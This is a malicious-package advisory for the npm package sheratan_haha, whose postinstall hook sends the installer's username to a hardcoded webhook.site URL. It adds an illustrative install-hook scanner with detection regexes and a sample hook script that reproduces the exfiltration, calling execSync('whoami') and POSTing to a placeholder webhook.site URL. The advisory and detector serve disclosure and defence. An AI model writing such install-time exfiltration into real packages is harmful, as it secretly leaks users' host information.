Malicious code in sheratan_haha (npm)
MAL-2026-5739
Description
Source: amazon-inspector (6b473b40e0c041d34e85161ed8c91e0e00d006a0822698a0d3994876cb685ddd)
On npm install, the package's declared postinstall hook (node postinstall.js) runs whoami on the installer's machine and POSTs the output to a hardcoded webhook.site endpoint (https://webhook.site/0ea9eb45-3ede-4cf0-9ea9-2b8d700272e7) via https.request. The package advertises itself as 'A simple date formatting utility' but ships no library code consistent with that purpose — the only behavior on install is host fingerprinting and exfiltration to an attacker-controlled URL. Metadata is placeholder-shaped (empty author, generic description, name sheratan_haha), consistent with a dependency-confusion / recon PoC. Installing this package leaks the installer's OS username to an external endpoint controlled by the publisher.
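A static pre-install check for the pattern described above, as an added example that is not part of the advisory or of any scanner it cites: it reads a package's install-time lifecycle hooks and flags a hook script that both spawns a process and makes an outbound HTTP request. The function name, indicator patterns, verdict labels and sample manifests are assumptions constructed for illustration.

```javascript
// Added example: triage of npm install-time lifecycle hooks (heuristic, illustrative).
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];
const INDICATORS = {
  spawnsProcess: /\bchild_process\b|\bexec(Sync)?\s*\(|\bspawn(Sync)?\s*\(/,
  hostRecon: /\b(whoami|hostname|os\.userInfo|os\.hostname)\b/,
  outboundHttp: /\bhttps?\.(request|get)\s*\(|\bfetch\s*\(/,
  hardcodedUrl: /https?:\/\/[^\s'"`)]+/,
};

// manifest: parsed package.json; files: map of file name -> source text.
function auditInstallHooks(manifest, files) {
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = (manifest.scripts || {})[hook];
    if (!command) continue;
    // Resolve "node <file>" to that file's source; otherwise scan the command itself.
    const m = /^node\s+(\S+)/.exec(command.trim());
    const target = m ? m[1].replace(/^\.\//, '') : null;
    const body = target && files[target] !== undefined ? files[target] : command;
    const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(body));
    const urls = body.match(new RegExp(INDICATORS.hardcodedUrl, 'g')) || [];
    // Process execution combined with an outbound request at install time is the
    // behaviour the advisory describes, so that combination is blocked outright.
    const exfilShape = hits.includes('spawnsProcess') && hits.includes('outboundHttp');
    const verdict = exfilShape ? 'block' : hits.length ? 'review' : 'note';
    findings.push({ hook, command, hits, urls, verdict });
  }
  return findings;
}

// Constructed samples (not the real package contents; the URL id is a placeholder).
const suspectManifest = { name: 'example-date-utility', scripts: { postinstall: 'node postinstall.js' } };
const suspectFiles = {
  'postinstall.js': [
    "const { execSync } = require('child_process');",
    "const who = execSync('whoami').toString();",
    "const req = https.request('https://webhook.site/PLACEHOLDER-ID', { method: 'POST' });",
  ].join('\n'),
};
const benignManifest = { name: 'example-native-addon', scripts: { install: 'node-gyp rebuild', test: 'node test.js' } };

console.log(JSON.stringify(auditInstallHooks(suspectManifest, suspectFiles), null, 2));
console.log(JSON.stringify(auditInstallHooks(benignManifest, {}), null, 2));
```

Installing with npm's --ignore-scripts option prevents lifecycle hooks such as postinstall from running, so a package can be unpacked and inspected this way before any of its code executes.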